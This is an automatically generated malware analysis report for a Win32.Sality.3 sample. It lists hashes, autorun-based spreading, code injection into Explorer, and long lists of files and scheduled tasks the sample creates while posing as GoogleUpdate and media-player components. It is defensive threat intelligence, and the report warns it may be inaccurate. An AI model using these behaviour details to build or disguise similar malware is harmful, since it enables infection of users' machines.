Win32.Sality.3_4349e06c6d

by malwarelabrobot on October 22nd, 2014 in Malware Descriptions.

Win32.Sality.3 (B) (Emsisoft), Win32.Sality.3 (AdAware), Trojan.Win32.Alureon.FD, Virus.Win32.Sality.FD, Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, Virus, WormAutorun


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 4349e06c6d8b7677af3099bc0ee5d727
SHA1: 15b8ebdfa17bcc42081ae6dacc15669d27dd0388
SHA256: e385622cb5ed5e8cae557e320849d0595c325db264c713fc5eafa70aaac1eb6c
SSDeep: 196608:foymYvquDTSnlxpf8FBXFf5ihM36YfYbYDGgbTfoe2:fo5YvtSnlXf8FZ4YDVbTq
Size: 8041352 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-04 15:55:02
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.


Process activity

The Trojan creates the following process(es):

GoogleUpdate.exe:2460
GoogleUpdate.exe:756
GoogleUpdate.exe:2652
GoogleUpdate.exe:2296
GoogleUpdate.exe:1288
GoogleUpdate.exe:2364
GoogleUpdate.exe:2356
772406a5-70fe-462f-841c-e18bdccbdc78-3.exe:1540
Iufkopcpdfjpcg.exe:424
MPlayerplus_01-bg.exe:2776
772406a5-70fe-462f-841c-e18bdccbdc78-4.exe:2112
%original file name%.exe:688
regsvr32.exe:2736
dwwin.exe:3088
MPlayerplus_01-codedownloader.exe:2344
MPlayerplus_01-codedownloader.exe:2224
772406a5-70fe-462f-841c-e18bdccbdc78-2.exe:2848

The Trojan injects its code into the following process(es):

3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe:852
Explorer.EXE:1684

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process GoogleUpdate.exe:2460 makes changes in the file system.
The Trojan deletes the following file(s):

%Program Files%\globalUpdate\Update\Install (0 bytes)

The process GoogleUpdate.exe:756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Cab9.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (2712 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (898 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (894 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabB.tmp (56 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarC.tmp (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (32 bytes)
%Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (56 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CabB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (0 bytes)

The process Iufkopcpdfjpcg.exe:424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (352077 bytes)
%Program Files%\MPlayerplus_01\MPlayerplus_01-bg.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsisos.dll (5 bytes)
%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll (3361 bytes)
%Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-4.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\1.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode\extension.js (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\102.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\253.js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\4.js (3312 bytes)
%Program Files%\MPlayerplus_01\MPlayerplus_01-codedownloader.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\252c_appcompat.txt (4124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\247798 (258822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\191.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\goopdate.dll (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\13.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\94.js (1 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-4.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\211.js (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\MPlayerplus_01\1293297481.mxaddon (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\91.js (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\InstallerUtils.dll (25824 bytes)
%Program Files%\MPlayerplus_01\MPlayerplus_01.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\155.js (449 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\244.js (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\42.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\246.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)
%Program Files%\MPlayerplus_01\utils.exe (66998 bytes)
%Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-2.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\md5dll.dll (6 bytes)
%Program Files%\MPlayerplus_01\360-54246.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].json (39 bytes)
%Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-5.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\190.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\103.js (2 bytes)
%Program Files%\MPlayerplus_01\54246.xpi (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\221.js (383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\93.js (793 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\psmachine.dll (673 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-2.job (70 bytes)
%Program Files%\MPlayerplus_01\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe (3312 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-5.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\104.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\220.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\233.js (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\37.js (2 bytes)
%Program Files%\MPlayerplus_01\Uninstall.exe (601 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-3.job (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-1.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\InstallerUtils2.dll (3312 bytes)
%WinDir%\Tasks\temp_772406a5-70fe-462f-841c-e18bdccbdc78-2.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\195.js (378 bytes)
%Program Files%\MPlayerplus_01\54246.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdateHelper.msi (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins.json (15 bytes)
%Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-3.exe (13122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\226.js (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\260954 (973591 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\38.js (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\211.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\190.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\28.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\103.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\21.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\update.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\221.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\1.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\207.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\182.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\253.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\7.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\39.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\183.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\155.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\InstallerUtils2.dll (0 bytes)
%WinDir%\Tasks\temp_772406a5-70fe-462f-841c-e18bdccbdc78-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\22.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\72.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\195.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\244.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\220.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\233.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\191.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\9.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\226.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\260954 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\177.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\247798 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\38.js (0 bytes)

The process %original file name%.exe:688 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\system.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00157D19_Rar\%original file name%.exe (61184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (265148 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Zvbbyym.tmp (248938 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Iufkopcpdfjpcg.exe (983586 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\WrapperUtils.dll (2392 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Zvbbyym.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Iufkopcpdfjpcg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\WrapperUtils.dll (0 bytes)

The process MPlayerplus_01-codedownloader.exe:2344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\263[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\286[1].js (975 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\93[1].js (951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\281[1].js (483 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\246[1].js (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\233[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\244[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\260[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\192[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\bg_code[1].js (432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\104[1].js (919 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\195[1].js (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\289[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\273[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\262[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\42[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1_7_1_min[1].js (44457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\242[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\102[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\91[1].js (86201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\211[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\221[1].js (413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\269[1].js (491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\220[1].js (13921 bytes)
